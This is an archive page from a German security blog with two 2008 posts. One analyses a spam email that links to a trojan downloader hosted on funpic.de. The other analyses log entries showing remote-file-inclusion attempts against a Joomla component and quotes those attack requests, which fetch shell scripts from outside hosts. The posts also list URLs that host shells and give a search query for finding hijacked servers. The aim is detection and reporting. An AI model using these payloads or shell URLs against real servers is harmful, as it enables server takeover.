Monthly Archive for February, 2008

Malware missbraucht funpic.de

Published on February 14, 2008 in Malware & Virus Analysing. 1 Comment Tags: , , , , , , .

Heute habe ich folgendes Email in meinem Postfach erhalten:

trojandownloaderwin32smalliil.jpg

Das Email umwirbt ein angebliches Tool mit dem Namen ReGet Deluxe Final Activation Crack generatro. Der Schreibfehler generatRo (anstelle von generatoR) wurde wahrscheinlich mit Absicht gemacht, um die gängigen Spam-Filter zu umgehen.

Das Email ist in HTML geschrieben. Hinter dem Text Download it now! verbirgt sich ein vermeidlicher Link zu google.com. Sieht man sich den Link jedoch genauer an bemerkt man, dass die eigentliche URL auf funpic.de verweist. funpic.de ist ein Gratis Webhoster, welcher mit Yahoo GeoCities (geocities.yahoo.com) vergleichbar ist. Klickt man also auf den Link, leitet google.com das Opfer weiter zu folgender URL:

http://bibo1981.bi.funpic.de/baustelle/movie/rdown.php

Beim aufruft dieser URL wird das Opfer aufgefordert, eine EXE-Datei mit dem Namen mpg.exe herunter zu laden. Die Datei wird zur Zeit (2008.02.14 11:38:59 [CET]) durch 19 von 32 getesteten Virenscannern erkannt. Kaspersky identifiziert den Virus als Trojan-Downloader.Win32.Small.iil.

Filename: mpg.exe
File size: 1405 bytes
MD5: aabce2758862f177b8c3a426b1aeb22a
SHA1: 93d19432344b6fab56fa18d04a65daff0b2022ec
PEiD: FSG v2.0 -> bart/xt
packers: FSG
packers: FSG

Versucht man auf das Verzeichnis zu zugreifen in welche die infizierte Datei liegt, entdeckt man folgendes:

dir-baustelle-movie.jpg

Wie man auf dem oberen PrintScreen sieht, listet das Verzeichnis sämtlichen Inhalt auf. Dabei kommt noch eine zweite EXE-Datei mit dem Namen activ852.exe zum Vorschein. Die Datei wird zur Zeit von den meisten Virenscannern erkennt (27/31, 2008.02.14 11:01:33 [CET]). Kaspersky erkennt die Datei als Trojan.Win32.Agent.epo:

Filename: active852.exe
MD5: 78729d8f489358a3a8003142ebc1e811
SHA1: 90bed63e81dcd520946c979a7b72f45972671774
SHA256: 20ca862e4dc0059ae17ff473080d0ad5b575977afa634d63ec656027dba2bfa4
SHA512: 8fafb3e7bc848e00b2d0d4ef9b4acef4c15b7cbbca2bf5bdd46f425d0bdee738 3784bbb30c7e8376cd0f68e252e14fa97239ce5a3281c58785f8ecdde53a2f2b

Bis jetzt habe ich die Malware nur auf http://bibo1981.bi.funpic.de gesichtet. Falls weitere subdomains gesichtet werden welche für die Verbreitung von Malware genutzt werden, sollten diese domains an den Abuse Desk von funpic.de gemeldet werden abuse [at] funpic.de.

Webapplikationen und deren Sicherheitslücken

Published on February 10, 2008 in Monitoring & Reporting. 0 Comments Tags: , , , , , .

Schon seit längerer Zeit sichte ich in meinem Webserver Logfile immer wieder die selben mysteriösen Einträge:

222.237.78.72 “GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?”

81.13.86.150 “GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?”

Heute habe ich mir Zeit genommen, um diese seltsamen Einträge in meinem Log ein bisschen genauer unter die Lupe zu nehmen. Folgendes konnte ich bis jetzt in Erfahrung bringen:

Es ist offensichtlich, dass immer wieder versucht wird, ein Fremdes Script über das (auf meinem Webserver nicht vorhandene) PHP-Script “selfclass.php” auf den Webserver zu schmuggeln. Bis jetzt habe ich das Script “id.txt” auf den folgenden Webservern gesichtet:

http://www.iljd.org/id.txt

http://www.gumgangfarm.com/shop/data/id.txt

http://opsz.3x.ro/safeon.txt

Das PHP-Script components/com_sef/sefclass.php, über welches versucht wird den Fremden Code ein zu schleusen, gehört zu dem Content Management System (CMS) Joomla!. Ich gehe davon aus, dass in einer älteren Version von Joomla! ein Fehler in diesem Script gefunden wurde und nun Scriptkiddies versuchen, diese Schwachstelle in noch ungepatchten Systemen auszunutzen.

Zurück zum mysteriösen Script id.txt: Speichert man dieses als PHP-Datei ab und ruft es auf, erscheint folgende Zeile im Webbrowser:

Mic22 uid=33(www-data) gid=33(www-data) groups=33(www-data)

By-the-way: Wir wissen also nun, dass sich der Täter wahrscheinlich Mic22 nennt.

Ist das ausführen dieses Scriptes auf einem Webserver erfolgreich und erscheint der obere Code (in diesem Fall wäre das Script selfclass.php verwundbar), wird eine PHP-Shell oder ein ShellBot installiert. In meinem Fall wurde versucht über das selbe Fehlerhafte Script den folgenden ShellBot zu installieren: bl4cks.com/sistem/alat/scanuk.txt. Sieht man sich den Quellcode des Bot’s an, findet man folgende Zeile:

#Mic22 Is Here!

Natürlich ist Mic22 nicht der einzige, welcher Schwachstellen in bekannten Webapplikationen ausnützt um fremde Webserver zu kapern und darauf seine ShellBots installiert. Hier noch ein paar weitere Domains, welche Shells aller Art hosten:

http://www.crownvisioncenter.com/company/_notes/safe.txt

http://test.iearn.uz/test.iearn.uz/help.txt

http://chmod.altervista.org/modalita/cmd2.txt

http://test.shell.tor.hu/ait.txt

http://vsfuzi.com/fuzi/safeon.txt

Mit den folgenden Begriffen lassen sich übrigens sehr viele Shells und gekaperte Rechner aufspüren google.ch filetype:txt + Mic22 -AWSTATS. Vielleicht findet ihr ja auch euren Webserver als Shell-Hoster wieder.

Aufspüren der verdächtigen Log-Einträgen

Solche Einträge wie im oben genannten Beispiel lassen sich ziemlich einfach finden:

  • Der User-Agent ist in den meisten Fällen libWWW (z.B. libWWW 5.803)
  • Der Code für die PHP-Shells und Shellbots ist zu fast 100% aller Fälle in einer Text Datei abgespeichert gefolgt von einem Fragezeichen? Somit kann man das Webserver Logfile einfach nach “.txt?” durchsuchen.

    • Blacklist

    Wie ihr wisst, betreibe ich die abuse.ch HTTP abuser list in welcher IP-Adressen von Scriptkiddies und Hackern gesammelt werden, um dann den Zugriff von diesen IP-Adressen per .htaccess Datei oder dem WP Ban Plugin zu blockieren. Ich habe nun ebenfalls ein Honeypot eingerichtet, welcher gekaperte Webserver einfängt und mit “hijacked Webserver” in die Blacklist einträgt.
    abuse.ch HTTP abuser list: LINK

    Tipps

    Ein paar kleine Tipps:

  • Vergewissert euch, dass euer Webserver und die darauf laufenden Applikationen immer auf dem neusten stand sind.
  • Werft ab und zu mal einen Blick in eure Logfiles (SSH, HTTP, FTP, etc..) und haltet nach verdächtigen Aktivitäten Ausschau.
  • Falls ihr ähnliche Einträge wie oben findet, könnt ihr die entsprechende Zeile im Logfile dem Webserver Incident Reporting and Termination Squad (WsIRT) melden. WsIRT meldet das Problem dann den entsprechenden Abuse-Desks weiter.
  • Verwendet Tools wie Snort, abuse.ch HTTP abuser list, DShield und fail2ban um die Sicherheit und Ãœberwachung eures Webservers zu verbessern.
    •
    economics-recluse
    Scene
    Urgent!